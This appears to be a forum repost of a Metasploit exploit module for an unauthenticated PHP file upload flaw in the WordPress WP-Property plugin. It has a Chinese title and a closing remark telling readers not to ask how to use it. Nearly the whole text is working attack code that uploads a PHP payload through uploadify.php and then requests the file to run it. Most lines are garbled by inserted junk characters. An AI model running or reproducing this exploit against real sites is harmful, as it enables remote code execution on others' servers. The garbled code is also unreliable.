WordPress WP-Property PHP 文件上传漏洞
- k6 ?; T. M/ F# |4 i' q# L# A
+ s1 @ b4 t& e6 z2 {/ G+ L" J ## # This file is part of the Metasploit Framework and may be subject to% Y+ m' a. p) ^
- E$ m! d* v. n8 H" n! J+ |# redistribution and commercial restrictions. Please see the Metasploit; ~- Y z Q" ^, A! U d3 D
) T/ ^" ~. l) N6 m2 m8 L8 K' o# Framework web site for more information on licensing and terms of use.9 _3 E" W! M6 E% ^# x3 R( b8 X
' N% }8 |- T; x+ J4 h+ A7 n9 A. a
# http://metasploit.com/framework/ ##1 X! P$ [; [) g1 f2 H; O
- b. D! w. w8 C4 I 6 U* E6 R- E \7 p- G
1 _6 B( n7 c+ j! r3 N 5 H3 k. n# x5 [
) ] h% S, l' ^2 y
require 'msf/core'
' S. J, I! \* I% O1 X7 E, hrequire 'msf/core/exploit/php_exe'6 R* \% ]# R+ \4 w+ x- e# k; B
- M6 E8 E9 B8 n% Y) v8 T+ a; {; k% ^
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit:hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',4 E% M# h8 T# ?
'Description' => %q{0 b) O- y, l" D1 f7 y; m
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>1 m8 } c2 u# z
[' R$ L" B8 W4 j
'Sammy FORGIT', # initial discovery0 L: Y2 l0 e$ j- R: x( b! c* P
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
; U) U2 v! k1 A' @9 n$ }],3 a- k6 h6 O& w' x$ L, ]
'License' => MSF_LICENSE,
1 d- l+ E. R$ G6 a, w8 y'References' =>4 S) q# J# ?7 v/ Z$ h
[
+ L1 n" ~4 \# N9 D2 j9 }( X" n[ 'OSVDB', '82656' ],' @% _) R6 c( ]- U( {' q
[ 'BID', '53787' ],
8 {) |# R+ L0 ~% D z[ 'EDB', '18987'],6 S3 c1 H/ Q, e: R- S M( Z
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]1 L9 ]! l8 o9 @
],: s: P3 Q: | u4 i+ P: t
'Payload' =>: j+ T3 g8 S; I+ j. V" v# x( W
{
3 e( y. R. w6 H; e5 ['BadChars' => "\x00",& d; e- l6 g$ c8 ^2 O
},; E# J! P0 R+ I1 R
'Platform' => 'php',
" k9 `4 H. Z. {'Arch' => ARCH_PHP,
0 k, r' N. G* v3 M \'Targets' =>
" a8 a' z: W3 N& H' S; z! R[
. m6 \8 G. j) f/ X) S/ V6 o9 [[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
3 b% }& P% l: j. L: C[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
( ?& D7 T T4 T! c],
* { }- c# x; J% a: L# A2 e& r'DefaultTarget' => 0,
& a' ^% w" Q1 ] A'DisclosureDate' => 'Mar 26 2012')). Y3 \+ R: K: I: h h. ]5 k D
+ q' d4 b5 n! Q7 b- h
register_options(5 d: |3 ^' ?9 n4 {1 v* b
[* L5 S. \5 B! I& g) f) J8 z
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])4 W3 B8 w2 m& }4 l) ]4 J
], self.class)
* `$ m8 Q, w2 W" a1 c( m+ K; kend
; F$ j) j+ o% A5 r2 T1 Z5 D# e
0 _% U8 @' v j! o( Y& y T8 tdef check5 H4 o1 c/ k- q1 s+ s5 x! s; c
uri = target_uri.path
# N J5 Z' G- k5 c2 z Quri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',1 h: ] b$ [. p2 o
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"6 e/ W ~, C& b3 a
})
$ H0 ]0 i' J! k! n' D$ K( M$ Y" G* K: z2 Q4 g) _# s
if not res or res.code != 200
# S2 f" [7 a/ ereturn Exploit::CheckCode::Unknown
) W8 P' ^- ]1 l- P [end
, K) B- W- f: h0 K' q7 i! @% |* k
+ W9 a* ?# w0 k4 e- R2 areturn Exploit::CheckCode::Appears
t7 C( Q9 f9 x9 q' U x* Mend8 x; ?! I \8 l, H7 r
3 T6 p; Z8 z' Q/ g
def exploit
/ r8 S* [9 ~; p+ p# X/ Guri = target_uri.path, N: C/ Z3 d2 W- a& K7 p
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
: V& b" o4 `+ [: w1 G2 s3 i' R
8 f" m. f: ? {2 Z( Z# Mdata = Rex::MIME::Message.new
/ o9 @5 P8 {' Adata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
) K& l) Y2 P! N; J) g/ Edata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")* @3 y! ? o5 z+ h) B
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
) p7 P* |3 l& h; L& p% ]; q4 A* m. M. j Z
print_status("#{peer} - Uploading payload #{@payload_name}")
9 x! |' ~+ P( jres = send_request_cgi({) N! h9 {* Q+ N( r" c: v1 M$ S0 {1 u
'method' => 'POST',) O. F: ^$ _* g: O4 d: }& _
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
u# J5 ~5 p) @& z+ K- o. P" Y'ctype' => "multipart/form-data; boundary=#{data.bound}",0 A5 V' x, Q s/ Q! ~5 G0 f$ _1 _' W
'data' => post_data
) t h9 E1 T% j$ }' a1 j})
0 {' C# h1 L* W
1 K& {# \: F8 X& c+ uif not res or res.code != 200 or res.body !~ /#{@payload_name}/
' n' m5 g: E- Y, s0 _; `fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")( c ]# L; x |5 x! B$ u0 M7 D! ?
end2 u% X0 r- A# {
. M6 d# u: [$ K; e' I8 f" n; gupload_uri = res.body
* N, C4 X T) b2 O
6 g* t' R" D% Q' F, Aprint_status("#{peer} - Executing payload #{@payload_name}")
8 G" M5 L0 d+ `; D2 a' i; e% [+ Cres = send_request_raw({7 M. P- J0 r/ W9 g) w
'uri' => upload_uri,& @: B5 k6 x/ ]
'method' => 'GET'8 q7 e; i, ?" L# L V f M2 U+ R
})
7 Q8 z* `2 e+ t7 F; J, }9 j- |! Lend
6 ^* T6 E5 }9 G, qend
) g- [, U- s) }" k# S7 J
. {$ S; \5 x$ Q* }3 h7 c( g不要问我这写的是什么 怎么利用 我是说msf.
7 ~2 t/ ]& ?; L5 k" k
, n9 e2 U [# [3 A) t! y7 l2 k+ } |